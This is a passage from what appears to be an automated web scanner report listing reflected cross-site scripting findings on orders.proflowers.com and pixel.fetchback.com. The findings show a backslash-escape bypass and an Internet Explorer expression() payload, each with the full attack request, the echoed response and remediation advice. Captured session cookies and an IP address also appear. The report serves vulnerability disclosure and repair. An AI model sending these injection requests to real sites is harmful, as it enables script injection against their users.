Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:28:03 GMT
Content-Length: 62385


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBScb909\\";alert(1)//3c15789ae2e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event42";

   if ("" != "") {
       events
...[SNIP]...
4.175. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66d3d\"%3balert(1)//c331d736d2e was submitted in the trackingpgroup parameter. This input was echoed as 66d3d\\";alert(1)//c331d736d2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS66d3d\"%3balert(1)//c331d736d2e&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:35:04 GMT
Content-Length: 49389


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS66d3d\\";alert(1)//c331d736d2e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event6";

   if ("" != "") {
       events +
...[SNIP]...
4.176. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e370\"%3balert(1)//51a496b9619 was submitted in the trackingpgroup parameter. This input was echoed as 5e370\\";alert(1)//51a496b9619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30008396&ssid=27&COBRAND=pfc&trackingpgroup=PBS5e370\"%3balert(1)//51a496b9619&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:34:53 GMT
Content-Length: 62306


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS5e370\\";alert(1)//51a496b9619"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event42";

   if ("" != "") {
       events
...[SNIP]...
4.177. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a02c\"%3balert(1)//1b2e7429a7 was submitted in the trackingpgroup parameter. This input was echoed as 6a02c\\";alert(1)//1b2e7429a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS6a02c\"%3balert(1)//1b2e7429a7&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:47 GMT
Content-Length: 46930


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS6a02c\\";alert(1)//1b2e7429a7"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...
4.178. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d3f\"%3balert(1)//4a4ac1ba8fa was submitted in the trackingpgroup parameter. This input was echoed as 67d3f\\";alert(1)//4a4ac1ba8fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA&selectedrelationshipID=168084&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/24/2011&pid=30003767&ssid=27&COBRAND=pfc&trackingpgroup=PBS67d3f\"%3balert(1)//4a4ac1ba8fa&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:30:09 GMT
Content-Length: 46934


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS67d3f\\";alert(1)//4a4ac1ba8fa"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...
4.179. https://orders.proflowers.com/OrderProcess/Order.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24de3\"%3balert(1)//6387582c293 was submitted in the trackingpgroup parameter. This input was echoed as 24de3\\";alert(1)//6387582c293 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/Order.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_carousel&selectedrelationshipID=428685&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=HPC24de3\"%3balert(1)//6387582c293&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:24:34 GMT
Content-Length: 46946


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPC24de3\\";alert(1)//6387582c293"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...
4.180. http://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 2ccab<x%20style%3dx%3aexpression(alert(1))>059125350e6 was submitted in the name parameter. This input was echoed as 2ccab<x style=x:expression(alert(1))>059125350e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing2ccab<x%20style%3dx%3aexpression(alert(1))>059125350e6&sid=3006 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
